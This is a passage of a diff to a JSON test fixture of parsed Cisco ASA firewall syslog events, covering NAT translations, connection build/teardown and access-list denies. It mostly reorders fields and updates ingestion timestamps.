@@ -6157,25 +6154,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6185,12 +6179,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363628100Z", + "ingested": "2021-12-14T14:36:23.392276720Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", @@ -6204,25 +6201,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6232,12 +6226,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363633300Z", + "ingested": "2021-12-14T14:36:23.392277117Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -6251,25 +6248,22 @@
 },
 "cisco": {
 "asa": {}
- }
- },
- {
- "process": {
- "name": "CiscoASA",
- "pid": 999
- },
- "log": {
- "level": "informational"
 },
 "tags": [
 "preserve_original_event"
- ],
+ ]
+ },
+ {
 "observer": {
 "hostname": "localhost",
 "product": "asa",
 "type": "firewall",
 "vendor": "Cisco"
 },
+ "process": {
+ "name": "CiscoASA",
+ "pid": 999
+ },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
 "version": "1.12.0"
@@ -6279,12 +6273,15 @@
 "localhost"
 ]
 },
+ "log": {
+ "level": "informational"
+ },
 "host": {
 "hostname": "localhost"
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363639600Z",
+ "ingested": "2021-12-14T14:36:23.392277514Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -6298,7 +6295,10 @@
 },
 "cisco": {
 "asa": {}
- }
+ },
+ "tags": [
+ "preserve_original_event"
+ ]
 },
 {
 "process": {
@@ -6362,7 +6362,7 @@
 "severity": 6,
 "duration": 325000000000,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363645Z",
+ "ingested": "2021-12-14T14:36:23.392277910Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -6447,7 +6447,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:31:36.363650200Z",
+ "ingested": "2021-12-14T14:36:23.392278341Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -6529,7 +6529,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363653900Z",
+ "ingested": "2021-12-14T14:36:23.392278729Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278",
 "code": "305011",
 "kind": "event",
@@ -6608,7 +6608,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363658600Z",
+ "ingested": "2021-12-14T14:36:23.392279121Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)",
 "code": "302013",
 "kind": "event",
@@ -6691,7 +6691,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363664Z",
+ "ingested": "2021-12-14T14:36:23.392279530Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -6772,7 +6772,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363668300Z",
+ "ingested": "2021-12-14T14:36:23.392279924Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -6853,7 +6853,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363673400Z",
+ "ingested": "2021-12-14T14:36:23.392280312Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -6934,7 +6934,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363678600Z",
+ "ingested": "2021-12-14T14:36:23.392281299Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -7015,7 +7015,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363683100Z",
+ "ingested": "2021-12-14T14:36:23.392281722Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -7096,7 +7096,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363687500Z",
+ "ingested": "2021-12-14T14:36:23.392282105Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -7177,7 +7177,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363692300Z",
+ "ingested": "2021-12-14T14:36:23.392282489Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -7258,7 +7258,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363698500Z",
+ "ingested": "2021-12-14T14:36:23.392282870Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -7339,7 +7339,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363703100Z",
+ "ingested": "2021-12-14T14:36:23.392283254Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -7420,7 +7420,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363707100Z",
+ "ingested": "2021-12-14T14:36:23.392283793Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -7501,7 +7501,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363711Z",
+ "ingested": "2021-12-14T14:36:23.392284175Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -7582,7 +7582,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363716Z",
+ "ingested": "2021-12-14T14:36:23.392284554Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -7663,7 +7663,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:31:36.363720800Z",
+ "ingested": "2021-12-14T14:36:23.392284937Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -7744,7 +7744,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363725300Z",
+ "ingested": "2021-12-14T14:36:23.392285319Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279",
 "code": "305011",
 "kind": "event",
@@ -7823,7 +7823,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363729900Z",
+ "ingested": "2021-12-14T14:36:23.392285708Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)",
 "code": "302013",
 "kind": "event",
@@ -7906,7 +7906,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363734Z",
+ "ingested": "2021-12-14T14:36:23.392286159Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190",
 "code": "305011",
 "kind": "event",
@@ -7985,7 +7985,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363738Z",
+ "ingested": "2021-12-14T14:36:23.392286578Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -8070,7 +8070,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-09T13:31:36.363742800Z",
+ "ingested": "2021-12-14T14:36:23.392286982Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373",
 "code": "302016",
 "kind": "event",
@@ -8153,7 +8153,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363748800Z",
+ "ingested": "2021-12-14T14:36:23.392287364Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -8238,7 +8238,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-09T13:31:36.363753400Z",
+ "ingested": "2021-12-14T14:36:23.392287749Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207",
 "code": "302016",
 "kind": "event",
@@ -8320,7 +8320,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363758Z",
+ "ingested": "2021-12-14T14:36:23.392288129Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280",
 "code": "305011",
 "kind": "event",
@@ -8399,7 +8399,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363763Z",
+ "ingested": "2021-12-14T14:36:23.392288577Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)",
 "code": "302013",
 "kind": "event",
@@ -8482,7 +8482,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363769100Z",
+ "ingested": "2021-12-14T14:36:23.392288961Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281",
 "code": "305011",
 "kind": "event",
@@ -8561,7 +8561,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363773600Z",
+ "ingested": "2021-12-14T14:36:23.392289348Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)",
 "code": "302013",
 "kind": "event",
@@ -8647,7 +8647,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363778500Z",
+ "ingested": "2021-12-14T14:36:23.392289737Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -8729,7 +8729,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363783Z",
+ "ingested": "2021-12-14T14:36:23.392290123Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282",
 "code": "305011",
 "kind": "event",
@@ -8808,7 +8808,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363788200Z",
+ "ingested": "2021-12-14T14:36:23.392290526Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)",
 "code": "302013",
 "kind": "event",
@@ -8894,7 +8894,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363792700Z",
+ "ingested": "2021-12-14T14:36:23.392291075Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -8976,7 +8976,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363797800Z",
+ "ingested": "2021-12-14T14:36:23.392291467Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283",
 "code": "305011",
 "kind": "event",
@@ -9055,7 +9055,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363802900Z",
+ "ingested": "2021-12-14T14:36:23.392291849Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)",
 "code": "302013",
 "kind": "event",
@@ -9141,7 +9141,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363807400Z",
+ "ingested": "2021-12-14T14:36:23.392292239Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -9226,7 +9226,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363812200Z",
+ "ingested": "2021-12-14T14:36:23.392292750Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -9308,7 +9308,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363818300Z",
+ "ingested": "2021-12-14T14:36:23.392293140Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284",
 "code": "305011",
 "kind": "event",
@@ -9387,7 +9387,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363823700Z",
+ "ingested": "2021-12-14T14:36:23.392293526Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)",
 "code": "302013",
 "kind": "event",
@@ -9473,7 +9473,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363828400Z",
+ "ingested": "2021-12-14T14:36:23.392293919Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -9555,7 +9555,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363832300Z",
+ "ingested": "2021-12-14T14:36:23.392294316Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285",
 "code": "305011",
 "kind": "event",
@@ -9634,7 +9634,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363836200Z",
+ "ingested": "2021-12-14T14:36:23.392294800Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)",
 "code": "302013",
 "kind": "event",
@@ -9717,7 +9717,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363841200Z",
+ "ingested": "2021-12-14T14:36:23.392295581Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286",
 "code": "305011",
 "kind": "event",
@@ -9796,7 +9796,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363845900Z",
+ "ingested": "2021-12-14T14:36:23.392295970Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)",
 "code": "302013",
 "kind": "event",
@@ -9879,7 +9879,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363851500Z",
+ "ingested": "2021-12-14T14:36:23.392296358Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287",
 "code": "305011",
 "kind": "event",
@@ -9958,7 +9958,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363855800Z",
+ "ingested": "2021-12-14T14:36:23.392296746Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)",
 "code": "302013",
 "kind": "event",
@@ -10041,7 +10041,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363861100Z",
+ "ingested": "2021-12-14T14:36:23.392297132Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288",
 "code": "305011",
 "kind": "event",
@@ -10120,7 +10120,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363865600Z",
+ "ingested": "2021-12-14T14:36:23.392297520Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)",
 "code": "302013",
 "kind": "event",
@@ -10206,7 +10206,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363869300Z",
+ "ingested": "2021-12-14T14:36:23.392297912Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -10291,7 +10291,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363873700Z",
+ "ingested": "2021-12-14T14:36:23.392298311Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -10376,7 +10376,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363878700Z",
+ "ingested": "2021-12-14T14:36:23.392298703Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -10458,7 +10458,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363882900Z",
+ "ingested": "2021-12-14T14:36:23.392299591Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289",
 "code": "305011",
 "kind": "event",
@@ -10537,7 +10537,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363887500Z",
+ "ingested": "2021-12-14T14:36:23.392300071Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)",
 "code": "302013",
 "kind": "event",
@@ -10620,7 +10620,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363892300Z",
+ "ingested": "2021-12-14T14:36:23.392300562Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290",
 "code": "305011",
 "kind": "event",
@@ -10699,7 +10699,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363896900Z",
+ "ingested": "2021-12-14T14:36:23.392300953Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)",
 "code": "302013",
 "kind": "event",
@@ -10785,7 +10785,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363901600Z",
+ "ingested": "2021-12-14T14:36:23.392331831Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -10867,7 +10867,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363906700Z",
+ "ingested": "2021-12-14T14:36:23.392332418Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291",
 "code": "305011",
 "kind": "event",
@@ -10946,7 +10946,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363910500Z",
+ "ingested": "2021-12-14T14:36:23.392332832Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)",
 "code": "302013",
 "kind": "event",
@@ -11032,7 +11032,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363915300Z",
+ "ingested": "2021-12-14T14:36:23.392333382Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -11117,7 +11117,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363920Z",
+ "ingested": "2021-12-14T14:36:23.392333780Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -11200,7 +11200,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363925300Z",
+ "ingested": "2021-12-14T14:36:23.392334162Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -11283,7 +11283,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363929500Z",
+ "ingested": "2021-12-14T14:36:23.392334548Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292",
 "code": "305011",
 "kind": "event",
@@ -11362,7 +11362,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363934Z",
+ "ingested": "2021-12-14T14:36:23.392334941Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)",
 "code": "302013",
 "kind": "event",
@@ -11447,7 +11447,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-09T13:31:36.363937900Z",
+ "ingested": "2021-12-14T14:36:23.392335360Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384",
 "code": "302016",
 "kind": "event",
@@ -11530,7 +11530,7 @@
 },
 "event": {
